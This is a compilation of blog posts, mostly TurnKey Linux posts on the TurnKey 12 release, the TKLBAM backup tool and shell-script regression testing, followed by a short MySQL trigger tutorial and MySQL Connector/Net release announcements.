In a bid to open up development to the community we've also tried to make TKLBAM more developer friendly by making its internals easier to explore via the "internals" command. We've also put the project up on GitHub. For a bit more detail, read the full release notes for TKLBAM 1.2.

TurnKey 12.0 appliances available in 7 delicious flavors

Optimized Builds

  1. ISO: Our bread and butter image format. Can be burned on a CD and run almost anywhere - including bare metal or any supported virtualization platform.
  2. Amazon EC2: 1,414 Amazon EC2 optimized builds, spanning the globe in all 7 regions, in both S3 and EBS backed flavors. The Hub has been updated and all images are available for immediate deployment.
  3. VMDK / OVF: For those of you who like a slice of virtual in your lemonade, we've got VMDK and OVF optimized builds for you too.
  4. OpenStack: The new kid on the block, OpenStack optimized builds are just a download away, get 'em while they're hot. Oh, and don't forget that these builds require a special initrd.
  5. OpenVZ: Got a sweet tooth for OpenVZ? Step right up! Using Proxmox VE? The TurnKey PVE channel has been updated as well for inline download and deployment right from your web browser.
  6. Xen: And who can forget about our favorite steady rock, optimized builds for Xen based hosting providers are at your fingertips.

Want just one appliance? Follow the download links on the site to download any image in any flavor individually from SourceForge.

Want to collect them all? Thanks to the good people manning TurnKey's mirror network, you can now get all the images in a particular image format (about 20 GB) or even the whole 120 GB enchilada.


  • 7 build formats
  • 606 downloadable virtual appliance images (120 GB worth)

Ubuntu vs Debian: the heart says Ubuntu, but the brain says Debian

One of the hardest things we had to do for this release was choose between Ubuntu and Debian. We initially planned on doing both. Then eventually we realized that would nearly double the amount of testing we had to do - a major bottleneck when you're doing 100+ appliances.

Think about it. At this scale, every extra hour of testing and bugfixing translates into about 2-3 weeks of extra work. And to what end? We already had way too much work to do, and the release kept getting pushed back, again and again. Did it really matter whether we supported both of them like we originally intended? Would it really provide enough extra value to users to warrant the cost? They were, after all, quite similar...

In the end, choosing to switch over to Debian and abandon Ubuntu support for now was hard emotionally but easy on a purely rational, technical basis:

  1. Ubuntu supports less than 25% of available packages with security updates

    Remember that TurnKey is configured to auto-install security updates on a daily basis.

    This may sound dangerous to users coming from other operating systems but in practice works great, because security updates in the Debian world are carefully back-ported to the current package version so that nothing changes besides the security fix.

    Unfortunately, if you're using Ubuntu there's a snag because Ubuntu only officially supports packages in its "main" repository section with security updates. Less than 25% of packages are included in the "main" repository section. The rest go into the unsupported "universe" and "multiverse".

    So if an Ubuntu based TurnKey appliance needs to use any of the nearly 30,000 packages that Ubuntu doesn't officially support, those packages don't get updates when security issues are revealed. That means users may get exposed to significantly more risk than with an equivalent Debian based TurnKey appliance.

    While Ubuntu is continually adding packages to its main repository, it can't keep pace with the rate at which thousands of Debian Developers add packages to Debian. In fact, with each release the gap grows wider, so an ever smaller percentage of packages makes it into main. For example, between Debian 6.0 (Squeeze) and the upcoming Debian 7.0 (Wheezy) release, 8000 packages were added. In a comparable amount of time, between Ubuntu 10.04 (Lucid) and Ubuntu 12.04, only 1300 packages were added to main.

  2. Debian releases are much more bug-free and stable

    Stability wise, there's no comparison. Even the Ubuntu Long Term Support releases that come out every two years have serious bugs that would have held up a Debian release.

    Fundamentally this is due to the differences in priorities that drive the release process.

    Debian prioritizes technical correctness and stability. Releases are rock solid because they only happen when all of the release critical issues have been weeded out.

    By contrast, Ubuntu prioritizes the latest and greatest on a fixed schedule. It's forked off periodically from the Debian unstable version, also known as "sid" - the Toy Story kid who breaks your toys. It then gets released on a fixed pre-determined date.

    There's no magic involved that makes Ubuntu suddenly bug-free by its intended release date compared with the version of Debian it was forked from. Ubuntu has a relatively small development team compared with Debian's thousands of developers. I think they're doing an amazing job with what they have but they can't perform miracles. That's not how software development works.

    So Debian is "done" when it's done. Ubuntu is "done" when the clock runs out.

  3. Ubuntu's commercial support is not available for TurnKey anyhow

    Part of the original rationale for building TurnKey on Ubuntu was Canonical's commercial support services. We theorized many higher-end business type users wouldn't be allowed to use a solution that didn't have strong commercial support backing.

    But 4 years passed, and despite talks with many very nice high level people at Canonical, nothing happened on the ground, except that one time Alon was invited to participate in an Ubuntu Developer Summit.

    We realized if we wanted to offer commercial support for TurnKey we'd have to offer it ourselves and in that case it would be easier to support Debian based solutions than Ubuntu.

Those were the main reasons for switching to Debian. Most of the people we talked to who cared about the issue one way or another preferred Debian for the same reasons, as did the majority of the 3000 people who participated in our website survey.

Don't get me wrong. Despite all the mud that has been slung at Ubuntu recently we still have a huge amount of respect for Ubuntu and even greater respect for the Ubuntu community. Sure, mistakes have been made, we're all only human after all, but let's not forget how much Ubuntu has done for the open source community.

Also, just because we don't have the resources to support Ubuntu versions of all TurnKey appliances right now doesn't mean we've ruled that out for the future. It's all about using the right tool for the job. If for some use cases (e.g., the desktop) that turns out to be Ubuntu, we'll use Ubuntu.

How to upgrade existing appliances to TurnKey 12

Simple: Just use TKLBAM to create a backup of an existing older version and then restore it on TurnKey 12.

TKLBAM only backs up files that have changed since the default installation. That means if you changed a configuration file on TurnKey 11.3 that configuration file will be backed up and re-applied when you restore to TurnKey 12.
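The "delta from the default installation" idea can be sketched in a few lines of shell. This is a toy illustration with made-up directory names, not TKLBAM's actual implementation:

```shell
# Toy sketch: copy into backup/ only the files that differ from a
# pristine baseline. Directory and file names here are made up.
mkdir -p baseline current backup
printf 'orig\n' > baseline/app.conf
printf 'untouched\n' > baseline/readme
cp baseline/app.conf baseline/readme current/
printf 'customized\n' > current/app.conf   # simulate a config change

for f in current/*; do
    base="baseline/$(basename "$f")"
    # cmp -s exits non-zero when the files differ (or baseline is missing)
    cmp -s "$base" "$f" || cp "$f" backup/
done

ls backup    # only app.conf differs, so only it lands in the backup
```

TKLBAM does the equivalent at the system level (and also handles databases, package state, users and groups), but the principle is the same: only the delta travels into the backup.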

What's next: opening up TurnKey, more developers = more appliances

To the inevitably disappointed among you whose favorite application hasn't made it into this release: please be patient, we're working within very tight resource constraints. I'll admit it's our own damn fault. We realized a couple of years too late that we hadn't been open enough in the way we've been developing TurnKey.

Better late than never though. We're working very hard to fix this. Much of the work we've been doing over the last year has been to clean up and upgrade our development infrastructure so we can open it up fully to the community (and support additional architectures such as amd64!).

Soon anyone will be able to build TurnKey appliances from scratch using the same tools the core development team is using. We're working on this because it's the right thing to do as an open source project. We're also hoping it will help more people from the open source community contribute to TurnKey as equal members and lift the labor bottleneck that is preventing us from scaling from 100+ to a 1000+  TurnKey appliances.

Many, many thanks to...

  • Jeremy Davis, Adrian Moya, Basil Kurian, Rik Goldman (and his students), L.Arnold, John Carver, and Chris Musty. These guys submitted many TKLPatches that made it into this release, and even more importantly kept the community alive while we dropped off the face of the earth to focus on development.

    Their dedication and generosity have been an inspiration. We'd like the community to get to know them better so we'll soon be publishing interviews with them on the blog. Stay tuned.

  • Jeremy Davis AKA "The JedMeister": TurnKey forum moderator and all around super great guy. Jeremy is such an important part of what makes the TurnKey community tick I figured I should thank him at least twice. For emphasis. :)

  • The many rivers of upstream: Debian, Ubuntu and all of the wonderful open source communities who give love and write code for the software that goes into TurnKey.

  • Everyone else who helped test the 12.0 release candidate and provided ideas and feedback.

  • TurnKey users everywhere. Without you, TurnKey's audience, there really wouldn't be a point.

New Hub feature: Auto-Restore TKLBAM backup to a new cloud server

Since we announced the release of TurnKey Hub v1.0 two weeks ago, we followed up with the two top issues users reported, and continued to receive awesome feedback - you guys rock, keep it coming!

A common question we received was related to restoring a backup to a new server. This wasn't a new question either; last year Phil Bower said: "I only want to run my instances while I'm using them so I'm interested in figuring out the fastest way to create new instances and restore backups to them."

In light of this, we just released a new Hub feature that streamlines the restore process depending on your use case. It also makes testing your backups even easier!

Restore this backup to a new cloud server

Alice is a consultant developing a new site for her client on TurnKey WordPress in a local virtual machine. She is regularly backing up her work with TKLBAM and has reached version 1.0 status - time for production.

Alice logs into her Hub account, goes to the backup dashboard and clicks "Restore this backup to a new cloud server". The Hub knows which appliance is related to her backup and launches a WordPress instance. TKLBAM is automatically initialized and her backup is restored, essentially migrating her local VM to the cloud.

Restore on Launch 1

Alice jumps up and down with excitement. She immediately calls up her client to give them the great news. Development to production in 3 minutes flat!

Launch a new server like this one

Bob (aka Evil Bob) has a highly customized TurnKey LAMP instance running in the cloud. He has added user accounts, installed packages, saved data on the filesystem as well as MySQL. Additionally, he configured an EBS volume and Elastic IP when he launched the instance. He even customized the firewall rules.

Bob only needs the instance to be up for a few days every week while crunching data for his evil plan, but launching a new instance, attaching the EBS, associating the EIP, tweaking the firewall rules and manually restoring his TKLBAM backup is a little tedious.

Tedious? Not any more! Once a week Bob logs into his Hub account, goes to the server dashboard and clicks "Launch a new server like this one".  He clicks the checkbox to automatically restore his backup, and he's off! The Hub launches a new server, automatically attaches his EBS volume (EBSMount mounts it), associates his Elastic IP, configures his custom firewall rules and restores his backup. 

Restore on launch 2

The lights dim, Evil Bob's face lights up; he raises his chin and lets out an evil laugh - MUHAHA!!

Note: The new restore features are not available for passphrase protected backups or legacy builds.

A lazy yet surprisingly effective approach to regression testing

To regression test, or not to regression test

Building up a proper testing suite can involve a good amount of work, which I'd prefer to avoid because it's boring and I'm lazy.

On the other hand, if I'm not careful, taking shortcuts that save effort in the short run could lead to a massive productivity hit further down the road.

For example, let's say instead of building up a rigorous test suite I test my code manually, and give a lot of careful thought to its correctness.

Right now I think I'm OK. But how long will it stay that way?

Often my code contains a significant amount of subtle complexity, and it would be easy to break in the future when the subtleties of the logic are no longer fresh in my mind.

That could introduce regressions, nasty regressions, especially nasty if this code goes into production and breaks things for thousands of users. That would be a very public humiliation, which I would like to avoid.

So in the absence of a proper regression test, the most likely outcome is that if I ever need to make changes to the code I will get paralyzed by fear. And that, at the very least, will increase the cost of code maintenance considerably.

So maybe a regression test would be a good idea after all.

Comparing outputs: minimum work, maximum result

With that settled, the only part left to figure out is how to do it in the laziest possible way that still works.

For TKLBAM I implemented a lazy yet effective approach to regression testing which should work elsewhere as well.

In a nutshell the idea is to setup a bit of code (e.g., a shell script) that can run in two modes:

  1. create reference: this saves the output from code that is assumed to work well. These outputs should be revision controlled, just like the code that generates them.

    For example, in tklbam if you pass regtest.sh the --createrefs CLI option it runs various internal commands on pre-determined inputs and saves their output to reference files.

  2. compare against reference: this runs the same code on the same inputs and compares the output with previously saved output.

    For example, in tklbam when you run regtest.sh without any options it repeats all the internal command tests on the same pre-determined inputs and compares the output to the previously saved reference output.

Example from TKLBAM's shell script regtest:

internal dirindex --create index testdir
testresult ./index "index creation"

Testresult is just a shell script function with a bit of magic that detects which mode we're running in (e.g., based on an environment variable because this is a lowly shell script).
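A minimal sketch of such a two-mode helper, assuming the mode is signalled through an environment variable. The variable name, the refs/ directory and the numbering scheme here are illustrative, not TKLBAM's actual internals:

```shell
# Minimal two-mode "testresult" sketch. REGTEST_CREATEREFS and refs/
# are made-up names for illustration.
testnum=0
testresult() {
    # $1 = file holding a command's output, $2 = test description
    output="$1"; desc="$2"
    testnum=$((testnum + 1))
    mkdir -p refs
    ref="refs/$testnum"
    if [ -n "$REGTEST_CREATEREFS" ]; then
        cp "$output" "$ref"              # create-reference mode: snapshot
    elif cmp -s "$ref" "$output"; then
        echo "OK: $testnum - $desc"      # compare mode: matches reference
    else
        echo "FAILED: $testnum - $desc"
    fi
}
```

Run the suite once with REGTEST_CREATEREFS=1 to snapshot the outputs, commit refs/ to revision control, and every later plain run compares against those snapshots.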

Example usage of regtest.sh:

$ regtest.sh --createrefs
$ regtest.sh
OK: 1 - dirindex creation
OK: 2 - dirindex creation with limitation
OK: 3 - dirindex comparison
OK: 4 - fixstat simulation
OK: 5 - fixstat simulation with limitation
OK: 6 - fixstat simulation with exclusion
OK: 7 - fixstat with uid and gid mapping
OK: 8 - fixstat repeated - nothing to do
OK: 9 - dirindex comparison with limitation
OK: 10 - dirindex comparison with inverted limitation
OK: 11 - delete simulation
OK: 12 - delete simulation with limitation
OK: 13 - delete
OK: 14 - delete repeated - nothing to do
OK: 15 - merge-userdb passwd
OK: 16 - merge-userdb group
OK: 17 - merge-userdb output maps
OK: 18 - newpkgs
OK: 19 - newpkgs-install simulation
OK: 20 - mysql2fs verbose output
OK: 21 - mysql2fs myfs.tar md5sum
OK: 22 - fs2mysql verbose output
OK: 23 - fs2mysql tofile=sql

I'm using this to test CLI-level outputs but you could use the same basic approach for code-level components (e.g., classes, functions, etc.) as well.

Note that one gotcha is that you have to strip local noise (e.g., timestamps, the current working directory) from the outputs you're comparing. For example, the testresult function I'm using for tklbam runs the output through sed and sort so that it doesn't include the local path.

Instead of:

/home/liraz/public/tklbam/tests/testdir 41ed    0       0
/home/liraz/public/tklbam/tests/testdir/chgrp   81a4    0 e1f06
/home/liraz/public/tklbam/tests/testdir/chmod   81a4    0 d58c9
/home/liraz/public/tklbam/tests/testdir/chown   81a4    0 d58cc
/home/liraz/public/tklbam/tests/testdir/donttouchme     81a4 0 4b8d58ab
/home/liraz/public/tklbam/tests/testdir/emptydir        41ed 0 4b8d361c
/home/liraz/public/tklbam/tests/testdir/file    81a4    0 d35bd
/home/liraz/public/tklbam/tests/testdir/link    a1ff    0 d362e

We get:

testdir 41ed    0       0
testdir/chgrp   81a4    0 e1f06
testdir/chmod   81a4    0 d58c9
testdir/chown   81a4    0 d58cc
testdir/donttouchme     81a4 0    4b8d58ab
testdir/emptydir        41ed 0    4b8d361c
testdir/file    81a4    0 d35bd
testdir/link    a1ff    0 d362e

That way the tests don't break if we happen to run them from another directory.
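The normalization itself can be a one-line pipeline. A sketch under the assumption that the only noise is the working-directory prefix (TKLBAM's actual sed expression may differ):

```shell
# Strip the current working directory prefix from each line, then sort
# in the C locale so ordering is stable across machines.
# Assumes $(pwd) contains no '|' characters (the sed delimiter used here).
normalize() {
    sed "s|^$(pwd)/||" | LC_ALL=C sort
}
```

Piping every test's output through a function like this before comparing keeps the reference files machine-independent.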

TKLBAM: a new kind of smart backup/restore system that just works

Drum roll please...

Today, I'm proud to officially unveil TKLBAM (AKA TurnKey Linux Backup and Migration): the easiest, most powerful system-level backup anyone has ever seen. Skeptical? I would be too. But if you read all the way through you'll see I'm not exaggerating and I have the screencast to prove it. Aha!

This was the missing piece of the puzzle that has been holding up the Ubuntu Lucid based release batch. You'll soon understand why and hopefully agree it was worth the wait.

We set out to design the ideal backup system

Imagine the ideal backup system. That's what we did.

Pain free

A fully automated backup and restore system with no pain. That you wouldn't need to configure. That just magically knows what to back up and, just as importantly, what NOT to back up, to create super efficient, encrypted backups of changes to files, databases, package management state, even users and groups.

Migrate anywhere

An automated backup/restore system so powerful it would double as a migration mechanism to move or copy fully working systems anywhere in minutes instead of hours or days of error prone, frustrating manual labor.

It would be so easy that, shockingly enough, you would actually test your backups. No more excuses. As frequently as you know you should, avoiding unpleasant surprises at the worst possible time.

One turn-key tool, simple and generic enough that you could just as easily use it to migrate a system:

  • from Ubuntu Hardy to Ubuntu Lucid (get it now?)
  • from a local deployment, to a cloud server
  • from a cloud server to any VPS
  • from a virtual machine to bare metal
  • from Ubuntu to Debian
  • from 32-bit to 64-bit

System smart

Of course, you can't do that with a conventional backup. It's too dumb. You need a vertically integrated backup that has system level awareness. That knows, for example, which configuration files you changed and which you didn't touch since installation. That can leverage the package management system to get appropriate versions of system binaries from package repositories instead of wasting backup space.

This backup tool would be smart enough to protect you from all the small paper-cuts that conspire to make restoring an ad-hoc backup such a nightmare. It would transparently handle technical stuff you'd rather not think about like fixing ownership and permission issues in the restored filesystem after merging users and groups from the backed up system.

Ninja secure, dummy proof

It would be a tool you could trust to always encrypt your data. But it would still allow you to choose how much convenience you're willing to trade off for security.

If data stealing ninjas keep you up at night, you could enable strong cryptographic passphrase protection for your encryption key that includes special countermeasures against dictionary attacks. But since your backup's worst enemy is probably staring you in the mirror, it would need to allow you to create an escrow key to store in a safe place in case you ever forget your super-duper passphrase.

On the other hand, nobody wants excessive security measures forced down their throats when they don't need them and in that case, the ideal tool would be designed to optimize for convenience. Your data would still be encrypted, but the key management stuff would happen transparently.

Ultra data durability

By default, your AES encrypted backup volumes would be uploaded to inexpensive, ultra-durable cloud storage designed to provide 99.999999999% durability. To put 11 nines of durability in perspective, if you stored 10,000 backup volumes you could expect to lose a single volume once every 10 million years.
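The arithmetic behind that claim checks out, assuming the loss probability applies per volume per year:

```shell
# Expected annual losses = volumes * per-volume annual loss probability.
# 11 nines of durability means a 1e-11 chance of losing any given volume
# in a year, so 10,000 volumes lose one volume every ~10 million years.
awk 'BEGIN {
    volumes   = 10000
    loss_prob = 1e-11                 # 1 - 0.99999999999
    per_year  = volumes * loss_prob   # 1e-7 expected losses per year
    printf "years per lost volume: %.0f\n", 1 / per_year
}'
```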

For maximum network performance, you would be routed automatically to the cloud storage datacenter closest to you.

Open source goodness

Naturally, the ideal backup system would be open source. You don't have to care about free software ideology to appreciate the advantages. As far as I'm concerned any code running on my servers doing something as critical as encrypted backups should be available for peer review and modification. No proprietary secret sauce. No pacts with a cloudy devil that expects you to give away your freedom, nay worse, your data, in exchange for a little bit of vendor-lock-in-flavored convenience.

Tall order huh?

All of this and more is what we set out to accomplish with TKLBAM. But this is not our wild eyed vision for a future backup system. We took our ideal and we made it work. In fact, we've been experimenting with increasingly sophisticated prototypes for a few months now, privately eating our own dog food, working out the kinks. This stuff is complex so there may be a few rough spots left, but the foundation should be stable by now.

Seeing is believing: a simple usage example

We have two installations of TurnKey Drupal6:

  1. Alpha, a virtual machine on my local laptop. I've been using it to develop the TurnKey Linux web site.
  2. Beta, an EC2 instance I just launched from the TurnKey Hub.

In the new TurnKey Linux 11.0 appliances, TKLBAM comes pre-installed. With older versions you'll need to install it first:

apt-get update
apt-get install tklbam webmin-tklbam

You'll also need to link TKLBAM to your TurnKey Hub account by providing the API-KEY. You can do that via the new Webmin module, or on the command line:

tklbam-init QPINK3GD7HHT3A

I now log into Alpha's command line as root (e.g., via the console, SSH or web shell) and do the following:

tklbam-backup

It's that simple. Unless you want to change defaults, no arguments or additional configuration required.

When the backup is done a new backup record will show up in my Hub account:

To restore I log into Beta and do this:

tklbam-restore 1

That's it! To see it in action watch the video below or better yet log into your TurnKey Hub account and try it for yourself.

Quick screencast (2 minutes)

Best viewed full-screen. Having problems with playback? Try the YouTube version.

The screencast shows TKLBAM command line usage, but users who dislike the command line can now do everything from the comfort of their web browser, thanks to the new Webmin module.

Getting started

TKLBAM's front-end interface is provided by the TurnKey Hub, an Amazon-powered cloud backup and server deployment web service currently in private beta.

If you don't have a Hub account already, request an invitation. We'll do our best to grant them as fast as we can scale capacity on a first come, first served basis. Update: currently we're doing ok in terms of capacity so we're granting invitation requests within the hour.

To get started log into your Hub account and follow the basic usage instructions. For more detail, see the documentation.

Feel free to ask any questions in the comments below. But you'll probably want to check with the FAQ first to see if they've already been answered.

Upcoming features

  • PostgreSQL support: PostgreSQL support is in development but currently only MySQL is supported. That means TKLBAM doesn't yet work on the three PostgreSQL based TurnKey appliances (PostgreSQL, LAPP, and OpenBravo).
  • Built-in integration: TKLBAM will be included by default in all future versions of TurnKey appliances. In the future when you launch a cloud server from the Hub it will be ready for action immediately. No installation or initialization necessary.
  • Webmin integration: we realize not everyone is comfortable with the command line, so we're going to look into developing a custom webmin module for TKLBAM. Update: we've added the new TKLBAM webmin module to the 11.0 RC images based on Lucid. In older images, the webmin-tklbam package can also be installed via the package manager.

Special salute to the TurnKey community

First, many thanks to the brave souls who tested TKLBAM and provided feedback even before we officially announced it. Remember, with enough eyeballs all bugs are shallow, so if you come across anything else, don't rely on someone else to report it. Speak up!

Also, as usual during a development cycle we haven't been able to spend as much time on the community forums as we'd like. Many thanks to everyone who helped keep the community alive and kicking in our relative absence.

Remember, if the TurnKey community has helped you, try to pay it forward when you can by helping others.

Finally, I'd like to give extra special thanks to three key individuals that have gone above and beyond in their contributions to the community.

By alphabetical order:

  • Adrian Moya: for developing appliances that rival some of our best work.
  • Basil Kurian: for storming through appliance development at a rate I can barely keep up with.
  • JedMeister: for continuing to lead as our most helpful and tireless community member for nearly a year and a half now. This guy is a frigging one man support army.

Also special thanks to Bob Marley, the legend who's been inspiring us as of late to keep jamming till the sun was shining. :)

Final thoughts

TKLBAM is a major milestone for TurnKey. We're very excited to finally unveil it to the world. It's actually been a not-so-secret part of our vision from the start. A chance to show how TurnKey can innovate beyond just bundling off the shelf components.

With TKLBAM out of the way we can now focus on pushing out the next release batch of Lucid based appliances. Thanks to the amazing work done by our star TKLPatch developers, we'll be able to significantly expand our library so by the next release we'll be showcasing even more of the world's best open source software. Stir It Up!




Definition: what is a MySQL trigger?

In MySQL Server, a trigger is a piece of code that runs automatically when a certain operation (INSERT, UPDATE, DELETE, and so on) is performed on a given table. In that sense, a trigger is a special kind of stored procedure. The following example walks through how a trigger works.



    /*Table structure for table `t_a` */
    CREATE TABLE `t_a` (
      `id` smallint(1) unsigned NOT NULL AUTO_INCREMENT,
      `username` varchar(20) DEFAULT NULL,
      `groupid` mediumint(8) unsigned NOT NULL DEFAULT '0',
      PRIMARY KEY (`id`)
    );

    /*Data for the table `t_a` */

    /*Table structure for table `t_b` */
    CREATE TABLE `t_b` (
      `id` smallint(1) unsigned NOT NULL AUTO_INCREMENT,
      `username` varchar(20) DEFAULT NULL,
      `groupid` mediumint(8) unsigned NOT NULL DEFAULT '0',
      PRIMARY KEY (`id`)
    );

    /*Data for the table `t_b` */





    DELIMITER $$

    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_insert`$$
    CREATE /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_insert` AFTER INSERT ON `t_a`
        FOR EACH ROW
            INSERT INTO `t_b` SET username = NEW.username, groupid = NEW.groupid$$

    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_update`$$
    CREATE /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_update` AFTER UPDATE ON `t_a`
        FOR EACH ROW
        BEGIN
          IF NEW.groupid != OLD.groupid OR OLD.username != NEW.username THEN
            UPDATE `t_b` SET groupid = NEW.groupid, username = NEW.username
              WHERE username = OLD.username AND groupid = OLD.groupid;
          END IF;
        END$$

    USE `test`$$
    DROP TRIGGER /*!50032 IF EXISTS */ `tr_a_delete`$$
    CREATE /*!50017 DEFINER = 'root'@'localhost' */
        TRIGGER `tr_a_delete` AFTER DELETE ON `t_a`
        FOR EACH ROW
            DELETE FROM `t_b` WHERE username = OLD.username AND groupid = OLD.groupid$$

    DELIMITER ;






        INSERT INTO `t_a` (username,groupid) VALUES ('sky54.net',123);
        SELECT id,username,groupid FROM `t_a`;
        SELECT id,username,groupid FROM `t_b`;
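The same synchronization pattern can be checked end-to-end with SQLite, which supports row triggers with a very similar syntax (a WHEN clause instead of an IF block, and no DELIMITER juggling). This is an illustrative sketch, not part of the original article:

```python
import sqlite3

# In-memory database standing in for the `test` schema above
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.executescript("""
CREATE TABLE t_a (id INTEGER PRIMARY KEY AUTOINCREMENT,
                  username TEXT, groupid INTEGER NOT NULL DEFAULT 0);
CREATE TABLE t_b (id INTEGER PRIMARY KEY AUTOINCREMENT,
                  username TEXT, groupid INTEGER NOT NULL DEFAULT 0);

-- Mirror every insert on t_a into t_b, like tr_a_insert
CREATE TRIGGER tr_a_insert AFTER INSERT ON t_a
BEGIN
    INSERT INTO t_b (username, groupid) VALUES (NEW.username, NEW.groupid);
END;

-- Keep t_b in step with updates, like tr_a_update
CREATE TRIGGER tr_a_update AFTER UPDATE ON t_a
WHEN NEW.groupid != OLD.groupid OR NEW.username != OLD.username
BEGIN
    UPDATE t_b SET username = NEW.username, groupid = NEW.groupid
    WHERE username = OLD.username AND groupid = OLD.groupid;
END;
""")

cur.execute("INSERT INTO t_a (username, groupid) VALUES ('sky54.net', 123)")
print(cur.execute("SELECT username, groupid FROM t_b").fetchall())
# -> [('sky54.net', 123)]
cur.execute("UPDATE t_a SET groupid = 456 WHERE username = 'sky54.net'")
print(cur.execute("SELECT username, groupid FROM t_b").fetchall())
# -> [('sky54.net', 456)]
```

Running it shows the insert propagating to t_b immediately and the update trigger firing only because groupid actually changed.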



Everything in this world has both strengths and weaknesses; the two are opposite sides of the same thing. This is not to push a black-and-white "dualism" — "whatever exists, exists for a reason." Leaving the advantages of MySQL triggers aside, the drawbacks are worth stating: MySQL triggers lack good debugging and management tooling, are hard to test across different system environments, and are harder to test than MySQL stored procedures. In production environments, therefore, prefer stored procedures over MySQL triggers where possible.



abin 2016-08-18 17:25








1. When the "weight" value is positive

2. When the "weight" value is negative
abin 2015-10-12 00:50

          How to Install TaskBoard on CentOS 7        
TaskBoard is a free and open source application for keeping track of the tasks that need to be done. It requires minimal dependencies to work. The database is stored in SQLite, which eliminates the need for MySQL or any other database server.
          How to Install MySQL Server with phpMyAdmin on FreeBSD 11        
In this tutorial, we will install MySQL with phpMyAdmin, along with the Apache web server and PHP 5.6. MySQL is a free and open source relational database management system that stores data in tabular form; it is the most popular way of storing data in a database. phpMyAdmin is also a free and open source application, used to administer a MySQL server instance through a rich graphical user interface.
          MySQL Connector/Net 6.4.4 has been released        
MySQL Connector/Net 6.4.4, a new version of the all-managed .NET driver for MySQL has been released.  This is an update to our latest GA release and is intended for full production deployment.

Version 6.4.4 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

The release is also available for download on the My Oracle Support (MOS) and will be available from Oracle eDelivery.

This release includes several bug fixes including a fix to using Windows authentication.  Please review the change log and documentation for a review of what changed.

Enjoy and thanks for the support!
          Forum for MySQL Installer        
A few days ago we announced the availability of our new MySQL Installer for Windows.  While it's a great first edition we know that you are going to have questions and we wanted the community to be able to help.  So we have created a new forum for the community to be able to discuss questions and issues with the new installer.

You can access the new forum here.

So, go forth and post!
          Welcome to the world, MySQL Installer for Windows!        
Well, our baby is born!  Some time ago we analyzed the feedback from users and customers and determined that far too many of our server installs were failing.  We have the best open-source database on the planet but no one can see that if we can't get it properly installed.  Clearly something had to be done.

So, the new MySQL Installer is born.  It's a Windows application that comes delivered in a bundle along with a version of the database server, applications like Workbench, connectors, samples, and documentation.  It includes some customized configuration screens that help with setting up the proper configuration files.

One of the great benefits of using the new MySQL Installer is that it comes with all the products very tightly integrated such as automatically creating connection entries in Workbench for the freshly installed server.  Our goal with MySQL is to have you up and running in 15 minutes.  With the new MySQL Installer, we've got that down to 3 minutes!

The best way to see all the greatness that is MySQL Installer is to download it yourself.  You can grab a copy here.

You can also see the Oracle press release on it here.

Thank you for trying out our new MySQL Installer and please let us know what you think!
          MySQL Connector/Net 6.4.3 GA has been released        
MySQL Connector/Net 6.4.3, a new version of the all-managed .NET driver for MySQL has been released.  This is a GA release and is intended for full production deployment.

Version 6.4.3 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.4.html] and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)
The release is also available for download on the My Oracle Support (MOS) and will be available from Oracle eDelivery.

** New features found in 6.4 include (please see release notes for more information) **

* Windows Authentication*
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

* Table Caching *
We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side.

* Simple connection fail-over support *

We are also including some SQL generation improvements related to our entity framework provider.   Please review the change log that ships with the product for a complete list of changes and enhancements.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.2.5 GA has been released (legacy)        
MySQL Connector/Net 6.2.5, an update to our all-managed .NET driver for MySQL, has been released.  This is an update to our legacy 6.2 version line. All new development should be using a more recent product such as 6.4.3.

Version 6.2.5 is intended for use with versions of MySQL from 4.1 - 5.1.  It is not suitable for use with MySQL 5.5 or later.

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/] and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

This update includes more than 45 fixes from 6.2.4.  Please review the change log that is included with the product to determine the exact nature of the changes.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.1.6 (legacy update) has been released        
MySQL Connector/Net 6.1.6, an update to our all-managed .NET driver for MySQL, has been released.  This is an update to our legacy 6.1 version line. All new development should be using a more recent product such as 6.3.7.

Version 6.1.6 is intended for use with versions of MySQL from 4.1 - 5.1.  It is not suitable for use with MySQL 5.5 or later.

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

This update includes more than 35 fixes from 6.1.5.  Please review the change log that is included with the product to determine the exact nature of the changes.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.4.2 RC has been released        
MySQL Connector/Net 6.4.2, a new version of the all-managed .NET driver for MySQL has been released.  This is a Release Candidate and is intended for testing and exposure to new features.  We strongly urge you to not use this release in a production environment.

Version 6.4.2 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

New features found in 6.4 include (please see release notes for more information)

  • Windows Authentication -- This release includes our new support for Windows authentication when connecting to MySQL Server 5.5. 

  • Table Caching -- We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side. 

  • Simple connection fail-over support -- We are also including some SQL generation improvements related to our entity framework provider.  

Please review the change log that ships with the product for a complete list of changes and enhancements.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.3.7 has been released        
MySQL Connector/Net 6.3.7, a new version of the all-managed .NET driver for MySQL has been released. This is a maintenance release to our existing 6.3 products and is suitable for use in production environments against MySQL server 5.0-5.5.

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.3.html] and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

Please review the change log for details on what is fixed or changed in this release.
          MySQL Connector/Net 6.4.1 beta has been released        
